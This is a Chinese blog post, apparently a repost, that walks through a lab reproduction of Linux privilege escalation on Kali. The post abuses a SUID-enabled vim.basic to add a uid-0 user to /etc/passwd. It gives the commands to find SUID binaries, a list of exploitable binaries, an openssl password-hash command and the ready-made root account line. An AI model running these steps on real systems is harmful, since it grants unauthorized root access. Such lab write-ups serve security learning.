linux利用* vim提权,linux 通过suid vim.basic文件提权

最新推荐文章于 2023-11-27 12:47:29 发布
最新推荐文章于 2023-11-27 12:47:29 发布
阅读量135 收藏 2
点赞数
文章标签: linux利用* vim提权

在kali上复现

先给需要的vim.basic文件设置suid权限

chmod u+s /usr/bin/vim.basic

先adduser test1一个普通权限用户

现在就是一个合适的提权环境

通过以下命令可以找到存在suid权限的文件

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

可用于提权的文件有

nmap

vim

find

bash

more

less

nano

cp

ecdcfcc66f3e8a80983b966f324f387c.png

利用vim提权的思路是修改etc/passwd文件,为自己添加一个有root权限的用户

passwd文件用户格式为:用户名:密码:uid:gid:注释:home目录:用户的shell

这边可以看看root用户的格式

root:x:0:0:root:/root:/bin/bash

(密码这部分之所以是x,是因为真正的密码存在/etc/shadow文件里)

d93bee86441ad44f5ad93d8608028ae2.png

生成密码:用openssl passwd -1 –salt asd 123  (这里是-1(数字1)不是L)

直接写在passwd文件里面,

594f6b10ab5e3cac533e6a12d3f330ea.png

toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

用vim /etc/passwd可以修改,但是在保存是会出现E212,无法保存,提示我们没有权限修改这个

231af8f60d96cdb383c51aa43acc4de7.png

这时应该用之前find找到的vim.basic文件运行,这个程序是有suid权限的。绝对可以修改

vim.basic /etc/passwd

用这个打开,然后修改文件,就可以成功保存

daad4abef02e336e46521c2782911a06.png

可以看到已经添加了,su toor切换,密码123,再id查看一下权限

e153d0d6185c772cd53cf8ba9a309fd4.png

root权限

chmod u+s /usr/bin/vim.basic

来源:https://www.cnblogs.com/This-is-Y/p/13211224.html

黄一只
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux使用suid vim.basic文件实现
09-14
主要介绍了Linux使用suid vim.basic文件实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
升:利用Linux错配
最新发布
qq_68163788的博客
02-14 1480
Linux系统中,错误的配置可能导致漏洞,使攻击者能够获取比其本来限更高的限。这种错误配置可能涉及文件限、用户组设置、sudo配置等。 一种常见的错误配置漏洞是在文件限设置上。如果系统中的某个文件被设置为具有过高的限,例如普通用户可以执行的文件被设置为具有root限,攻击者可以利用这个漏洞来执行恶意代码并获取更高的限。 另一种错误配置漏洞是在用户组设置上。如果某个用户组被错误地配置为具有root限,攻击者可以将自己添加到这个用户组中,从而获取更高的限。
Unix /ubuntu 下装vim编辑器 和简单使用
en&ha
09-03 1773
 一 vim编辑器   1.vim编辑器简介     vim编辑器是Unix系统最初的编辑器。它使用控制台图形模式来模拟文本编辑窗口,允许查看文件中的行、在文件中移动、插入、编辑和替换文本。  2.检查vim软件包    在开始研究vim编辑器之前,最好先搞明白你用的Linux系统是哪种vim软件包。在有些发行版本中安装的是完整的vim,另外还有一个vi命令的别名,就像下面所显示的Cent...
Linux初阶】vim工具的使用 | vim配置 | sudo指令配置
Captain_ldx的博客
10-31 1201
vim的基础概念、操作,命令模式和底行模式的部分重要指令,vim的配置,sudo指令的配置
LinuxLinux环境基础开发工具使用(二)vimLinux编辑器-vim使用与介绍 详细讲解 、vim各模式的命令合集 、sudo问题的讲解 以及如何
NiNi_suanfa的博客
11-27 396
vi/vim的区别简单点来说,它们都是多模式 编辑器,不同的是vim是vi的升级版本,它不仅兼容vi的所有指令,而且还有一些新的特性在里面。例如语法加亮,可视化操作不仅可以在终端运行,也可以运行于x window、 mac os、windows。我们课堂上,统一按照vim来进行讲解。三种模式正常模式插入模式底行模式我们一共有12种总模式,大家下来可以研究一下还有 视图模式 :可以进行代码的批量化注释vim操作打开关闭查看查询插入删除替换撤销复制等等操作。练习:当堂口头模式切换练习。
SUID教程
星虐
11-18 965
SUID教程。
linux-的.vim文件-旧
04-16
linux-的.vim文件
Linux利用Vim文件进行密码保护的方法详解
09-15
主要给大家介绍了在Linux利用Vim文件进行密码保护的相关资料,文中介绍的非常详细,对大家具有一定的参考学习价值,需要的朋友们下面来一起看看吧。
linuxvim介绍
高压锅博客
02-14 191
01 vim vim = vi improved vim 是从 vi 发展出来的一个文本编辑器,支持 代码补全、编译 及 错误跳转 等方便编程的功能特别丰富,在程序员中被广泛使用,被称为 编辑器之神 查询软连接命令 在很多 Linux 发行版中直接把 vi 做成 vim 的软连接 # 查找 vi 的运行文件 $ which vi $ ls -l /usr/bin/vi $ ls -l /...
Linux shell 学习笔记(6)— vim 编辑器使用方法及技巧
wohu1104的专栏
05-15 449
vim编辑器 检查 vim 软件包 CentOS 发行版 $ alias vi alias vi='vim' $ $ which vim /usr/bin/vim $ $ ls -l /usr/bin/vim -rwxr-xr-x. 1 root root 1967072 Apr 5 2012 /usr/bin/vim $ ​ Ubuntu 发行版 在Ubuntu发行版中不仅没有vi命令...
内网渗透常用方式总结
j1044957016的博客
06-01 7132
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
vim配置
YoungForYou的专栏
08-13 478
1. 安装vim:apt-get install vim后,执行命令whereis vim,可以看到返回结果: vim: /usr/bin/vim /usr/bin/vim.tiny /usr/bin/vim.basic /etc/vim /usr/bin/X11/vim /usr/bin/X11/vim.tiny /usr/bin/X11/vim.basic /usr/share/vim /u
文件特殊限(SUID,SGID,Sticky)
swthink的博客
12-06 405
三种特殊限:SUID,SGID,Sticky安全上下文,何为安全上下文安全上下是一个访问控制属性,是selinux中的重要组成部分,在进行移动时,不会改变文件的属性和限,而复制的过程会改变文件的属性,而安全上下文是一个访问的凭证,特定的文件被特定的程序访问,安全上下文会关闭系统认为不安全的功能,当安全上下文相匹配时才允许访问。前:进程有属主和属组;文件有属主和属组二进制的可执行文件SUID限功能:任何一个可执行程序文件能不能启动为进程:取决发起者对程序文件是否拥有执行限启动为进程之后,其进程的属
Ubuntu下选择默认编辑器
tanxs001的专栏
02-20 921
在安装了svn后,建立仓库的注释时候默认启动了Nano编辑器,相当不顺手。 解决方法: sudo update-alternatives —config editor 会列出系统中的几个编辑器,如下: 0 /bin/nano 1 /bin/ed 2 /bin/nano 3 /usr/bin/vim.basic 4 /usr/bin/vim.tiny 其中vim会有
升和维持
FisrtBqy的博客
03-30 1296
渗透测试中常见的升和维持手段
常用Linux(非漏洞)
Thegentlest的博客
08-31 4646
编译如下文件并添加SUID限,在普通用户下执行该文件即可获得root的shell。}Note:上述SUID只是一部分并不全面,如需更多SUID详细信息可以参考如下链接GTFOBins。二、sudo命令当sudoers文件中某些用户包含某些命令的sudo限时,可能导致问题发生。sudo -l查看当前用户有哪些sudo限1.git执行!/bin/bash可以直接成功,less、man同理。...
深度分析linuxSUID|Find|NMAP|VIM...
qq_60115503的博客
05-07 2781
SUID是Set User ID,SGID是Set Group的意思 SUID是一种特殊限,设置了suid的程序文件,在用户执行该程序时,用户的限是该程序文件属主的限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的限,SGID与SUID相似,只是执行程序时获得的是文件属组的
linux suid 脚本,Linux使用suid vim.basic文件实现
weixin_39628343的博客
04-30 145
在kali上复现先给需要的vim.basic文件设置suid限chmod u+s /usr/bin/vim.basic先adduser test1一个普通限用户现在就是一个合适的环境通过以下命令可以找到存在suid限的文件find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/d...
linux终端用vim只读打开没有对应的.swp文件文件
06-06
如果你想在终端使用vim只读打开没有对应的.swp文件文件,可以使用以下命令: ``` vim -R -n filename ``` 其中,选项`-R`表示只读模式,选项`-n`表示禁用交换文件文件名`filename`为你要打开的文件名。这将以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值